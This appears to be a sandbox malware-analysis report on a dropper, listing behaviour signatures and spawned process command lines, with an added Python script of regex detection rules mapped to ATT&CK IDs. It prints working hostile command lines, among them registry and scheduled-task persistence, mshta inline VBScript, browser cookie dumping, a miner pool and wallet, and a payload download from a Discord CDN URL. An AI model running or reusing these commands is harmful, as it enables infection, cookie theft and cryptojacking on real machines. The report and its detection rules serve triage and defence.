| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\System32\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (6).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
Suspicious use of WriteProcessMemory
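The command lines listed under Processes below carry the indicators that matter for triage of this sample: a Startup-folder redirect and a logon-script value written through reg.exe, a scheduled task that relaunches a payload every minute, mshta running inline VBScript, cookie-dump and cookie-delete switches against Chrome and Edge profile databases, a miner pool and wallet passed on the command line, a payload pulled from Discord CDN, and the cmd/findstr/ping tricks used to unpack and delay. The script below is an added example written for this page, not part of the sandbox report or of any tool it names; it runs a small regex rule set over command lines copied from the Processes list (the miner line is abridged to the switches the rule keys on) and tags each hit with an ATT&CK technique ID that I assigned, not one the report states. The rule names, regexes and the `triage`/`summarize` helpers are my own.

```python
import re

# Command lines copied from the Processes list of this report. The builder.exe
# line is abridged to the pool/wallet/task switches; the others are verbatim.
# The final sihclient.exe line is a Windows Update component, kept as a negative case.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )',
    r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6' + '\\',
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F',
    r'reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f',
    r'C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt',
    r'C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"',
    r"builder.exe -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -ntask'SystemCheck'",
    r'C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""',
    r'"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks',
    r'findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks',
    r'ping YJTUIPJF -n 30',
    r'C:\Windows\System32\sihclient.exe /cv fxGCPoqzUkqRX7Y2Kt3T4A.0.2',
]

# (rule name, ATT&CK technique ID assigned by the editor, case-insensitive regex).
# Each regex keys on the switch or argument shape, not on file names, so it
# survives the random drop names this family uses.
RULES = [
    ("Startup folder redirected via User Shell Folders", "T1547.001",
     r'reg\s+add\s+.*user shell folders.*?/v\s+startup\b'),
    ("Logon script set via UserInitMprLogonScript", "T1037.001",
     r'reg\s+add\s+.*\\environment.*?userinitmprlogonscript'),
    ("Scheduled task relaunching a payload every minute", "T1053.005",
     r'schtasks(\.exe)?"?\s+/create\b.*?/sc\s+minute\s+/mo\s+1\b'),
    ("mshta running inline VBScript", "T1218.005",
     r'mshta(\.exe)?"?\s+vbscript:'),
    ("Browser cookie database dumped to a text file", "T1539",
     r'/scookiestxt\b'),
    ("Browser cookies deleted by wildcard", "T1539",
     r'/deletecookieswildcard\b'),
    ("Miner pool and wallet passed on the command line", "T1496",
     r'stratum\+tcp://.*?-wallet'),
    ("Payload fetched from Discord CDN", "T1105",
     r'https?://cdn\.discordapp\.com/'),
    ("cmd fed commands from a non-script file via stdin", "T1059.003",
     r'\bcmd(\.exe)?"?\s*<\s*\S+'),
    ("findstr /V carving a payload out of a carrier file", "T1027",
     r'findstr\s+/v\s+/r\s+"\^'),
    ("Execution delay via ping to a bogus host", "T1497.003",
     r'\bping(\.exe)?\s+\S+\s+-n\s+\d+'),
]
COMPILED = [(name, tech, re.compile(pat, re.I)) for name, tech, pat in RULES]


def triage(cmdline):
    """Return the (rule name, technique) pairs that fire on one command line."""
    return [(name, tech) for name, tech, pat in COMPILED if pat.search(cmdline)]


def summarize(cmdlines):
    """Map each technique ID to the indices of the command lines that hit it."""
    summary = {}
    for i, line in enumerate(cmdlines):
        for _, tech in triage(line):
            hits = summary.setdefault(tech, [])
            if i not in hits:
                hits.append(i)
    return summary


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_CMDLINES):
        hits = triage(line) or [("no rule fired", "-")]
        for name, tech in hits:
            print(f"[{i:2}] {tech:10} {name}")
    print(summarize(SAMPLE_CMDLINES))
```

Two of the rules deserve a caveat when they are moved into production detection: `/scookiestxt` and `/DeleteCookiesWildcard` are switches of a legitimate command-line cookie utility that admins also run, so they should be scored together with the dropper context (a renamed copy in `%TEMP%` writing to a random file name) rather than alerted on alone; and `ping <host> -n N` is a routine batch-file sleep, so the rule is only useful in combination with the `cmd < file` and `findstr /V` hits from the same parent.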
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (6).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv fxGCPoqzUkqRX7Y2Kt3T4A.0.2
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
"C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe"
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
"C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe"
C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe
"C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
"C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe"
C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe
"C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe"
C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe
"C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe"
C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe
"C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe"
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
"C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe"
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
"C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe"
C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe
"C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
"C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
"C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe"
C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe
"C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe"
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
"C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe"
C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe
"C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
"C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe"
C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe
"C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O602V.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp" /SL5="$10356,138429,56832,C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe
"C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\C972.bat C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1736 -ip 1736
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe
"C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe"
C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe
"C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe"
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
"C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 316
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4000 -ip 4000
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3464 -ip 3464
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1888 -ip 1888
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 276
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 5172 -ip 5172
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1704 -ip 1704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5360 -ip 5360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5172 -s 28
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 292
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "mUtXfmRxIl2lXYs36EcxefSC.exe" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4708 -ip 4708
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 684
C:\Users\Admin\AppData\Roaming\8914591.exe
"C:\Users\Admin\AppData\Roaming\8914591.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\6576850.exe
"C:\Users\Admin\AppData\Roaming\6576850.exe"
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Roaming\2258295.exe
"C:\Users\Admin\AppData\Roaming\2258295.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Roaming\6105934.exe
"C:\Users\Admin\AppData\Roaming\6105934.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\is-CRUOJ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-CRUOJ.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 1456 -ip 1456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 276
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\17166\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\AppData\Local\Temp\is-P0NH0.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P0NH0.tmp\Stats.tmp" /SL5="$40302,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C970.tmp\C971.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Users\Admin\AppData\Local\Temp\is-CSPU0.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CSPU0.tmp\Inlog.tmp" /SL5="$5022C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-S46A1.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S46A1.tmp\WEATHER Manager.tmp" /SL5="$1042A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
